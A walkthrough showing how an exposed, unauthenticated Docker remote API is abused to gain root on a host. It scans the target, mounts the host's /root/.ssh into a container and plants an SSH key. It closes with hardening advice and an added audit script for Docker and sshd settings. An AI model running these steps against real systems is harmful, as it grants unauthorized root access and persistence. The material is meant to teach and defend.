Docker with remote access enabled can be exploited for root privilege escalation

Current (local) IP:

[root@node01 ~]# ifconfig eth0|sed -n -e '/inet /p'|awk '{print $2}'
192.168.22.68
[root@node01 ~]#

Target IP:

192.168.86.190

First, scan the target with nmap to see which ports are open:

[root@node01 ~]# nmap -sS -p 1-65535 192.168.86.190

Starting Nmap 6.40 ( http://nmap.org ) at 2019-12-25 16:40 CST
Nmap scan report for 192.168.86.190
Host is up (0.00034s latency).
Not shown: 65526 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
873/tcp   open     rsync
2375/tcp  open     unknown                    // Docker remote API port
3306/tcp  filtered mysql
4001/tcp  open     newoak
7001/tcp  open     afs3-callback
8080/tcp  open     http-proxy
60020/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
[root@node01 ~]#

Let's try ssh first. At this point we certainly can't get in, because we don't know the server's password:

[root@node01 ~]# ssh 192.168.86.190
The authenticity of host '192.168.86.190 (192.168.86.190)' can't be established.
ECDSA key fingerprint is SHA256:Kxx3gBWRj3GLge8LsSOKB3L1oWIdq4ULa/wp0GahYHo.
ECDSA key fingerprint is MD5:98:15:93:35:ef:1a:e6:96:1b:4a:aa:11:d9:19:d3:35.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.86.190' (ECDSA) to the list of known hosts.
root@192.168.86.190's password: 
Permission denied, please try again.
root@192.168.86.190's password: 
Permission denied, please try again.
root@192.168.86.190's password: 
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).
[root@node01 ~]# 

But the target appears to have Docker remote access enabled. Can we use that to break in and get root?

Approach:
Generate a key pair locally, then use a Docker volume mapping to get the public key onto the target indirectly, so that we can log in without a password.

# Check the Docker version

[root@node01 ~]# docker -H 192.168.86.190 version
Client: Docker Engine - Community
 Version:           19.03.5
 API version:       1.40
 Go version:        go1.12.12
 Git commit:        633a0ea
 Built:             Wed Nov 13 07:25:41 2019
 OS/Arch:           linux/amd64
 Experimental:      false

Server: Docker Engine - Community
 Engine:
  Version:          19.03.5
  API version:      1.40 (minimum version 1.12)
  Go version:       go1.12.12
  Git commit:       633a0ea
  Built:            Wed Nov 13 07:24:18 2019
  OS/Arch:          linux/amd64
  Experimental:     false
[root@node01 ~]# 

# Generate a key pair

[root@node01 ~]# ssh-keygen -t rsa -P ''
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:PZVTEV1rZe2VDqXRkZ8nxtzMRF8wru2SIzyeSflBvXI root@node01
The key's randomart image is:
+---[RSA 2048]----+
|             .OO%|
|             =o*X|
|            +++O=|
|         . . =*oB|
|        S o o.o..|
|         . + o . |
|          * * E  |
|         o * *   |
|          + .    |
+----[SHA256]-----+
[root@node01 ~]# ll /root/.ssh/id_rsa
id_rsa      id_rsa.pub  
[root@node01 ~]# 
[root@node01 ~]# cat /root/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxd11rFQA5lbv3naOKHXIz7/PwFf+w3zGfHgBO50f0Q71V9H2U8CVc+bL43L5jwe1m4ItqQ+kci+1qu0zov80En0GwXNR3AuohDl9QKijHXBYEUhofTeRxsB5s4WVE6zeR2onR3OJxhSP8T1sKAkkqa1bR6h55Ybp+UNNfedNaKSYR+JFi7GAS1/5QTBiYxv+NSUg5MuBFd6c4YZ/X8r0cTZUjqCWZpBrAtbn5XRNsz/31Y4GOXY6M+L/m/yiuE/8+CWrp7buFaQmW57Y2L9dq6ved98cYvrzKG90LbB/Uz7GSns+TtdKldkU1fLmHwcZ7X2u16wy846KZHD2JEM81 root@node01
[root@node01 ~]# 

# Start a container remotely and map the target's .ssh directory into the container, so that the public key can be added

[root@node01 ~]# docker -H 192.168.86.190 run -it -v /root/.ssh/:/mnt centos /bin/bash
[root@b74d29f82ead /]#
[root@b74d29f82ead /]# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxd11rFQA5lbv3naOKHXIz7/PwFf+w3zGfHgBO50f0Q71V9H2U8CVc+bL43L5jwe1m4ItqQ+kci+1qu0zov80En0GwXNR3AuohDl9QKijHXBYEUhofTeRxsB5s4WVE6zeR2onR3OJxhSP8T1sKAkkqa1bR6h55Ybp+UNNfedNaKSYR+JFi7GAS1/5QTBiYxv+NSUg5MuBFd6c4YZ/X8r0cTZUjqCWZpBrAtbn5XRNsz/31Y4GOXY6M+L/m/yiuE/8+CWrp7buFaQmW57Y2L9dq6ved98cYvrzKG90LbB/Uz7GSns+TtdKldkU1fLmHwcZ7X2u16wy846KZHD2JEM81 root@node01' >> /mnt/authorized_keys

[root@b74d29f82ead /]# exit

Sure enough, we now have root on the target:

[root@node01 ~]# ssh 192.168.86.190
Last failed login: Thu Dec 26 09:36:06 CST 2019 from 192.168.22.68 on ssh:notty
There were 6 failed login attempts since the last successful login.
Last login: Wed Dec  4 14:42:44 2019 from 192.168.1.15
[root@localhost ~]# ifconfig eth0|sed -n '/inet /p'|awk '{print $2}'
192.168.86.190
[root@localhost ~]# 

Summary

Avoid enabling Docker remote access wherever possible. If it must be enabled, do not open it to everyone; allow only specific IPs or internal subnets. Beyond that, disable remote root login, change the default SSH port, and avoid weak usernames when creating accounts, such as "test" for the test department...
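As a defensive companion to the summary, here is an added audit script that is not part of the original post. It checks a Docker daemon.json and an sshd_config for the weak settings listed above: an API published on every interface over plain TCP, root login permitted, and sshd on the default port. The file paths, the sample configurations, the certificate paths and the ops-admin user are all constructed for the example. The hardened daemon.json also turns on TLS client-certificate verification (tlsverify), which the post does not mention but which is what prevents an anonymous client from using the API even when the port is reachable.

```shell
#!/bin/sh
# Added audit example, not part of the original post. It checks the two
# configurations the summary warns about, against files given as parameters:
#   - a Docker daemon.json whose "hosts" binds the API to every interface
#     over plain TCP (what the target in the post exposed on 2375)
#   - an sshd_config that permits root login and keeps the default port
# All sample files below are constructed for the demonstration.

# Returns 0 (true) when daemon.json publishes the API on all interfaces
# (0.0.0.0, [::] or no address) and does not require client certificates.
docker_exposed() {
    f="$1"
    grep -Eq '"tcp://(0\.0\.0\.0:|\[::\]:|:)[0-9]+"' "$f" \
        && ! grep -Eq '"tlsverify"[[:space:]]*:[[:space:]]*true' "$f"
}

# Returns 0 when the first PermitRootLogin directive is "yes", or when it is
# absent (treated as a finding because older OpenSSH releases defaulted to yes).
# sshd uses the first value it reads for a keyword, so the parse stops there.
sshd_permits_root() {
    val=$(awk 'tolower($1)=="permitrootlogin" {print tolower($2); exit}' "$1")
    [ -z "$val" ] || [ "$val" = "yes" ]
}

# Returns 0 when sshd listens on the default port 22 (explicitly or by omission).
sshd_default_port() {
    val=$(awk 'tolower($1)=="port" {print $2; exit}' "$1")
    [ -z "$val" ] || [ "$val" = "22" ]
}

# audit DAEMON_JSON SSHD_CONFIG: prints one line per finding, returns the count.
audit() {
    n=0
    if docker_exposed "$1"; then
        echo "RISK: $1 binds the Docker API to all interfaces without tlsverify"; n=$((n + 1))
    fi
    if sshd_permits_root "$2"; then
        echo "RISK: $2 permits (or defaults to) root login over SSH"; n=$((n + 1))
    fi
    if sshd_default_port "$2"; then
        echo "NOTE: $2 keeps sshd on the default port 22"; n=$((n + 1))
    fi
    return $n
}

# --- constructed samples ------------------------------------------------------
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
WEAK_DAEMON="$tmp/daemon.weak.json"; HARD_DAEMON="$tmp/daemon.hardened.json"
WEAK_SSHD="$tmp/sshd_config.weak";   HARD_SSHD="$tmp/sshd_config.hardened"

# What the post's target effectively ran: unauthenticated API on 0.0.0.0:2375.
cat > "$WEAK_DAEMON" <<'EOF'
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
EOF

# Hardened: bound to one internal address only and client certificates
# required. The certificate paths are placeholders.
cat > "$HARD_DAEMON" <<'EOF'
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://192.168.86.190:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
EOF

cat > "$WEAK_SSHD" <<'EOF'
#Port 22
PermitRootLogin yes
PasswordAuthentication yes
EOF

# Hardened: non-default port, no root login, key-only authentication for a
# named admin account (ops-admin is a hypothetical user name).
cat > "$HARD_SSHD" <<'EOF'
Port 2222
PermitRootLogin no
PasswordAuthentication no
AllowUsers ops-admin
EOF

echo "== weak configuration =="
audit "$WEAK_DAEMON" "$WEAK_SSHD" || echo "findings: $?"
echo "== hardened configuration =="
if audit "$HARD_DAEMON" "$HARD_SSHD"; then echo "findings: 0"; fi
```

Binding to a single address in daemon.json still leaves the port reachable from the whole network, so the "allow only specific IPs or subnets" advice from the summary needs a host firewall rule on top, for example with firewalld: `firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="192.168.22.0/24" port port="2376" protocol="tcp" accept'` (the subnet here is the post's local network, used as an illustration). Two caveats on the checks themselves: Docker is often configured through `-H` flags in the systemd unit's ExecStart rather than daemon.json, so compare the script's verdict with `systemctl cat docker` and with what `ss -ltnp` shows actually listening; and the sshd_config parse only handles the `Keyword value` form, not `Keyword=value`.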
